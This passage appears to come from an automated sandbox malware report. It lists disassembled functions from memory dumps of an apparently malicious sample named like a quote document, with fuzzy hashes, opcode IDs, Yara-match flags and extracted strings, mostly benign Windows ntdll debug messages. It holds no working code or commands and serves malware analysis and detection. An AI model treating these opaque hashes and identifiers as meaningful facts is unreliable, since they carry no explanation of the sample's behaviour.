                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                                • Instruction ID: f42f154460297f27a3fa4f1e6794ea2db0c3414b807f70de5aca607e8d022ac0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DD022322130B193CB2856596904F63E915ABC0A90F1A006C340A93808C0088C42D2E0
                                                                                                                                                                                                                                                Function 0175A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                                • Instruction ID: 93a2ca660342b80205369f485a473ba640649d0bdd486155343277519afaaee6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD012371D054DBBCB219F66DC01F957BA9E7A4BA0F444420B514875A1C63AE950D584
                                                                                                                                                                                                                                                Function 0175CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                                                                                                                                • Instruction ID: 35699baf5041f521e87f2e440c011da16d1bf4ebad1990aad3838bfa3e11d843
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7D0A731501109CBDF27CF08C510E2EFA78FF20A41F50006CEB0051030E378ED01CA00
                                                                                                                                                                                                                                                Function 017302A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                                • Instruction ID: 6c3991655045e4bce9ee4161ec9900442ba4524de228c90053e02e52355a2483
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5D0C935256E80CFD61BCB0CC5A4F15B3A8BB84B44F8104D0F402CBB22D66CD940CA00
                                                                                                                                                                                                                                                Function 0175C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                                • Instruction ID: 0e32b51943ece1c2e8244a01b90d73fcaf6bc13fe0cf665c3abf4282aea1fbb9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94C01232150644AFC7119A95CD01F0177A9E798B40F000421F20447571C535E810D644
                                                                                                                                                                                                                                                Function 01740310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                                • Instruction ID: c040c1c995ea8c74d2756d216bfd520b6850d84bf7bb8be5e1f410fa7d5b39c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BD01236100248EFCB01DF41C890D9ABB2AFBD8710F108019FD19076108A31ED62DA50
                                                                                                                                                                                                                                                Function 01720750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                                • Instruction ID: e11e849fc49f1ea090c857721c97b72101e0f2bde606ff22fae08da391387c4a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DC04C797115458FCF15DB19D298F45B7E4F744750F1508D0E805CB722E624E841CA10
                                                                                                                                                                                                                                                Function 01762890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                • Opcode ID: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                                                                                                                                • Instruction ID: b1c81f082015e3e1ff10aa9068d89fecfdd11b82b8a53be36107d0e4522771e2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0254376a9836a6fc6d798ddbb9bfe2ce9649f23f404270ac800f6820e902fb0c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F51D5B1B00216AFDF51DB9C8C9097EFBBCBB48240B14C169E965D7646D734DE04CBA0
                                                                                                                                                                                                                                                Function 017D2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                • Opcode ID: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                                                                                                                                • Instruction ID: 2484f09295321102679f4ece7783770374025f08f51f0e7e7bec6b488a5b1c37
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e434be150d1d5034ae9b426946a4487198b04ac5848658ae6d8fc0e594c479c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D451F6B1A0064AAECB31DF5CC99097FFBF8EB44200B648899E997D7646E674DE018760
                                                                                                                                                                                                                                                Function 01757630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01794742
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01794725
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01794655
                                                                                                                                                                                                                                                • Execute=1, xrefs: 01794713
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017946FC
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 01794787
                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 017946A0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                                                                                • Opcode ID: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                                                                                                                                • Instruction ID: c36553e278c428ac8b2bdb3c7bf9d8ce048224f4f87d58cf864866e6b4ab8ef9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1da4f8b72122beb2543e649d482df790e5d0dc61435ea2332d9126a198b55d87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75511B71600219AAEF15AAA8EC99FADF7ACEF14304F8400D9EA05A71C1D7B0DA45CF61
                                                                                                                                                                                                                                                Function 0176B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                                • Instruction ID: fc667bba44a4044465d3398c88dc1083ffdf979374424fc90857a48f389340eb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC81A070F4524A9EEF258E6CC8917FEFBB9AF46320F18415ADD51E7291C73898408B91
                                                                                                                                                                                                                                                Function 017D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                                • Opcode ID: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                                                                                                                                • Instruction ID: 8c6c7795221a3f309ec49c41f5346410c9e0435daa3245c2ea01b1541b0e0358
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c1e76bfc361b309b35f0d55fab752050962925252ed9f410fa94e8612ae5d7d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921817AA0021DABDB11DE79CC44AAEFBF9AF54650F044116E915E3205E7319A028BA1
                                                                                                                                                                                                                                                Function 0174F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017902E7
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 0179031E
                                                                                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017902BD
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                                                                                • Opcode ID: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                                                                                                                                • Instruction ID: 0398d7809a5c936a496418bf9516e0741106963cf7f255da7569b1e117a08df3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 184d412b8d9b2b05e641a933c2db52f6428320f2cace16b946ddacaf1f66c80a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6E1AB716187419FEB25CF2CD884B2AFBE4AB84314F140A5DF5A5CB2E1D774D948CB42
                                                                                                                                                                                                                                                Function 0175BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01797B7F
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 01797BAC
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 01797B8E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                                                                                • Opcode ID: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                                                                                                                                • Instruction ID: 34376e181398082789d36b94b43678a357319e66b62b4c97609888c26fe7c05d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b73db9e5875d0b868c59304b6010cef621bc701908d510ac43eea9d62b78625d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B41D2317047029FDB25DE29D840B6AF7E6EF98710F100A1DFE5ADB680DBB1E9058B91
                                                                                                                                                                                                                                                Function 0175B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0179728C
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 017972C1
                                                                                                                                                                                                                                                • RTL: Resource at %p, xrefs: 017972A3
                                                                                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01797294
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                                                                                • Opcode ID: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                                                                                                                                • Instruction ID: 41ccccec3631e508df0e5faae036b85c319b02d4541762d24077b5be8a1f0050
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0d34dd55dd3381ed20da8ad2ce97379d104de1433a61869d6e378bc15f0d536
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25411031614202ABCB25CE29DC81B6AFBA6FF94710F100658FD55AB280DB70E8068BD1
                                                                                                                                                                                                                                                Function 017D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                                • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                                                                                                                                • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                                                                                                                                                                Function 01767D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                                                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                                • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                                                                                                                                                                Function 01729126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_16f0000_QUOTE2342534.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                                                                                • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                                                                                                                                • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 0418A34A Relevance: 35.4, Strings: 28, Instructions: 367COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !$"$%$%C$&$)7$*u$.$1$2$6$8t$D$Fe$H$IZ$J$L$RH$W$`$aY$b$f$lt$t$y$}
                                                                                                                                                                                                                                                • API String ID: 0-2838343554
                                                                                                                                                                                                                                                • Opcode ID: dc6607a0f66551ff2689e788c44ca04a01fa21650a7f417bbd42c01a8f7c0602
                                                                                                                                                                                                                                                • Instruction ID: e42378ed947c7b3f84a12c4700e6b6c81bbef4d7fa34bfbb69dc72f4b9e6b28f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc6607a0f66551ff2689e788c44ca04a01fa21650a7f417bbd42c01a8f7c0602
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF229BB0E05229CFEB24CF45C994BDDBBB2BF45348F1180DAC14D6A280D7B96A89DF51
                                                                                                                                                                                                                                                Function 04197DBA Relevance: 6.4, Strings: 5, Instructions: 152COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$O$S$\$s
                                                                                                                                                                                                                                                • API String ID: 0-3854637164
                                                                                                                                                                                                                                                • Opcode ID: 009d547ab78de7711e53a3bdf8e3ea68b61bd8c909407f24064c43db7d1fa525
                                                                                                                                                                                                                                                • Instruction ID: f8888c728a6522056937345f22592b14f15957fdc31629f9dca23684b31b6aaf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 009d547ab78de7711e53a3bdf8e3ea68b61bd8c909407f24064c43db7d1fa525
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD51BFB2910119ABEB14EF94DD88BEEB3B8EF44314F008699E91C67140E7707E588BA1
                                                                                                                                                                                                                                                Function 04183D61 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FD0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3fd0000_qnPyaKsYTE.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: k!
                                                                                                                                                                                                                                                • API String ID: 0-2344202445
